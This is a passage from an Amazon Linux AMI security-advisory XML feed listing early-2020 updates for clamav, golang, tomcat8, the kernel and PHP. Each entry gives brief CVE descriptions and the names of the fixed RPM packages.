arch="i686"><filename>Packages/389-ds-base-snmp-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.9.1-12.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1335</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1335: medium priority package update for clamav</title><issued date="2020-01-14 18:11:00" /><updated date="2020-01-15 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15961:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15961" title="" id="CVE-2019-15961" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.101.5" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.101.5-1.42.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.101.5" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.101.5-1.42.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-update" 
version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamd" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.101.5-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1336</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1336: medium priority package update for golang</title><issued date="2020-01-14 18:15:00" /><updated date="2020-01-15 21:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16276:
It was discovered that net/http (through net/textproto) in golang does not correctly interpret HTTP requests where an HTTP header contains spaces before the colon. This could be abused by an attacker to smuggle HTTP requests when a proxy or a firewall is placed behind a server implemented in Go, or to bypass filters, depending on the specific network configuration.
Go before 1.12.10 and 1.13.x before 1.13.1 allow HTTP Request Smuggling.
99999:
CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
1755969: CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276" title="" id="CVE-2019-16276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.4-1.57.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1337</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1337: medium priority package update for 
tomcat8</title><issued date="2020-01-14 18:18:00" /><updated date="2020-01-15 21:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17563:
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.
1785711: CVE-2019-17563 tomcat: session fixation
CVE-2019-12418:
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.
1785699: CVE-2019-12418 tomcat: local privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12418" title="" id="CVE-2019-12418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17563" title="" id="CVE-2019-17563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-docs-webapp" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.50" release="1.82.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.50-1.82.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1338</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1338: important priority package update for kernel</title><issued date="2020-02-04 22:39:00" /><updated date="2024-05-09 17:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19965:
In the Linux kernel through 5.4.6, there is a NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery, related to a PHY down race condition, aka CID-f70267f379b5.
CVE-2019-19332:
An out-of-bounds memory write issue was found in the way the Linux kernel's KVM hypervisor handled the 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the '/dev/kvm' device could use this flaw to crash the system, resulting in a denial of service.
CVE-2019-19062:
A flaw was found in the Linux kernel. The crypto_report function mishandles resource cleanup on error. A local attacker able to induce the error conditions could use this flaw to crash the system. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062" title="" id="CVE-2019-19062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332" title="" id="CVE-2019-19332" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19965" title="" id="CVE-2019-19965" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" 
version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.165" release="102.185.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1339</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1339: medium priority package update for php72 php73</title><issued date="2020-02-04 22:42:00" /><updated date="2020-02-07 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11050:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1788258: CVE-2019-11050 php: out-of-bounds read when parsing EXIF information
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to the mail() function, due to a mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
1788586: CVE-2019-11049 php: double free when supplying custom headers to mail function
CVE-2019-11047:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1786570: CVE-2019-11047 php: information disclosure in exif_read_data()
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, the PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying them with a string containing characters that are identified as numeric by the OS but aren't ASCII digits. This can lead to disclosure of the content of some memory locations.
1786567: CVE-2019-11046 php: OOB read in bc_shift_addsub
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, the PHP DirectoryIterator class accepts filenames with an embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking which paths the code is allowed to access.
1786572: CVE-2019-11045 php: PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
99999:
CVE-2019-11044 php: link function accepts filenames with embedded null byte and treats them as terminating at that byte on Windows
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package 
name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" 
release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.26" 
release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" 
